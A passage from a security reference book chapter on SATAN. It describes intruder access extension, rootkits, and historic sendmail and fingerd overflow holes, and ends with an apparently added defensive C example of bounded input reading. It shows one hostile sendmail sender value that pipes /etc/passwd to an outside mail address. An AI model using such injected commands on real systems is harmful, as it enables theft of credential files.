
Internet Security Professional Reference:SATAN and the Internet


Phase Three: Extend Access

After the intruder has root access, the system can be used to attack other systems on the network. Common attack approaches include modifications to login daemons to capture passwords (ftpd, telnetd, rlogind, login), addition of packet sniffers that capture the passwords of network traffic and send them back to the intruder, and masquerade attacks that attempt to use trust to gain access.

As mentioned before, SATAN specifically focuses on the first phase of an attack, and offers some help in the second phase. SATAN does not typically play a role in this third phase. Using the burglar analogy, SATAN helps to locate a car in the parking lot that has an unlocked door and indicates which door is unlocked (first phase). Then the burglar either looks for car keys left above the visor, or hotwires the car (second phase). Finally, this third phase involves driving the car around the parking lot to find other cars that are unlocked. As SATAN may have gathered information about other important hosts (NFS servers or NIS servers), this third phase may use that information to focus attacks on gathering access to those systems.

In general, once an intruder has control of your system, there is little you can do. A competent intruder can easily cover his tracks by modifying accounting and auditing records. Some enterprising hackers have even built automated programs that completely hide all traces of their presence; one popular version of this is called rootkit. This package comes with source for programs such as ps, ls, sum, and who; the system administrator is no longer able to determine the integrity of binaries because the sum command gives tainted information. Similarly, the ps command does not show the admin programs run by the intruder. Fortunately, rootkit is quite difficult to find—the primary distribution method has not been through FTP archives.

If you suspect that an intruder has gained root access to your system, you should get a fresh copy of admin binaries such as sum or md5 and check the checksums of your binaries against the original versions on the distribution CD. The COPS program can help do this, and Tripwire offers similar functionality.

An Overview of Holes

At this point, the general approach of a network attack should be clear. To explore the first phase of an attack, you should now investigate details on security holes that have been closed in popular Internet services. The following holes have been patched by most vendors and announced by CERT or the vendors; however, similar holes are frequently re-opened in new releases, and many system administrators are slow to apply patches. This underscores the fact that system administrators should install vendor patches as soon as they are released.

Unlike misconfiguration errors, which are described in detail later in the chapter, these security holes have arisen due mostly to software programming mistakes in the network daemons. Although the core set of scans included in SATAN does not include each of these holes, adding scans for the following holes to SATAN would be quite straightforward. An example of adding a scan to SATAN is included at the end of this chapter.


Note: A useful paper by Landwehr (Landwehr et al., 1993) gives a breakdown of the source of 50 security flaws. Of these 50 security holes, 9 were introduced because of user configuration errors, 3 were introduced by the vendor during code maintenance (patches), and the remaining 38 were introduced by the software designers during the design and creation of the program.

sendmail -d Debug Hole

A sendmail hole involves the -d command-line option, which permits a user to specify a debug level. All users must be able to invoke sendmail in order to send mail. By specifying a very large value to the debug option of sendmail, a user could overwrite the stack frame and cause unexpected commands to be executed. This was fixed by adding a range check to the passed values. SATAN scans for versions of sendmail that are old enough to include this security hole.

sendmail Bounce to Program Hole

By specifying a user such as |/bin/mail amyp@diana.com < /etc/passwd as the sender of a message, and then indicating a bad recipient name, sendmail would accept the message, attempt to send to the bad recipient, realize that user did not exist, and bounce an error message back to the sender. The sender would in reality be a program that executed, causing a malicious action such as mailing the passwd file. Sendmail was not smart enough to prevent senders from being programs. Once again, SATAN scans for versions of sendmail that are old enough to include this security hole.

sendmail syslog Buffer Problem

sendmail, along with many other programs, uses syslog() calls to send information to the syslogd daemon. The buffer in the syslogd daemon that receives syslog() writes was not checked for overflow. The syslog() call would invoke the vsprintf() libc call and overflow the stack frame for the vsprintf() call. The vsprintf() call was modified to prevent an overflow of the stack frame. A hacker script was made available to gain root access on SunOS systems by writing long information into the appropriate fields of an SMTP transfer, causing the remote sendmail to invoke a root shell.

fingerd Buffer Problem

One of the vulnerabilities exploited by the famous Internet worm: fingerd would read a line of information using the gets() call. The buffer allocated for the string was 512 bytes long, but fingerd did not check whether more than 512 bytes had been read before returning from the subroutine. If the line of information was longer than 512 bytes, the data was written over the subroutine's return address on the stack. The stack could thus be rewritten to permit the intruder to create a new shell and execute commands.

The Internet worm wrote 536 bytes of information to the gets() call, with the overflowing 24 bytes consisting of VAX assembly language code that, upon return from the main() call, tried to execute a shell by calling execve("/bin/sh",0,0).
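The missing check described above, written out as an added example (not code from the chapter or from any fingerd): a request-line reader that stops at the buffer boundary instead of trusting the sender, rejecting a line that would not fit, with the chapter's 512-byte buffer and 536-byte request reconstructed as constructed sample input; fmemopen() is assumed available (POSIX).

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define FINGER_BUF 512   /* the buffer size the chapter gives for fingerd */

/* Read one request line into buf (bufsz bytes). Unlike gets(), which keeps
 * writing past the end of the array, this stops at bufsz-1 bytes.
 * Returns 1 if a complete line fit, 0 if the line was longer than the
 * buffer (request rejected, rest of line drained), -1 on EOF with no data. */
int read_request_line(FILE *fp, char *buf, size_t bufsz) {
    if (fgets(buf, (int)bufsz, fp) == NULL) return -1;
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[n - 1] = '\0';
        return 1;
    }
    int c = fgetc(fp);
    if (c == EOF) return 1;           /* final line without newline: fits */
    while (c != '\n' && c != EOF)     /* over-long line: discard remainder */
        c = fgetc(fp);
    buf[0] = '\0';
    return 0;
}

/* Feed a constructed request of len bytes through the reader. */
int check_request(const char *data, size_t len) {
    char buf[FINGER_BUF];
    FILE *fp = fmemopen((void *)data, len, "r");
    if (fp == NULL) return -1;
    int rc = read_request_line(fp, buf, sizeof buf);
    fclose(fp);
    return rc;
}

/* A 536-byte line, the length the chapter gives for the worm's request. */
int demo_overlong(void) {
    char line[537];
    memset(line, 'A', 536);
    line[536] = '\n';
    return check_request(line, sizeof line);
}

/* An ordinary finger query (constructed sample input). */
int demo_normal(void) {
    const char *q = "amyp\r\n";
    return check_request(q, strlen(q));
}

int main(void) { printf("%d %d\n", demo_overlong(), demo_normal()); return 0; }
```

The same bounded pattern (fgets/snprintf/vsnprintf with an explicit size) is the fix for the sendmail syslog vsprintf() problem above.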

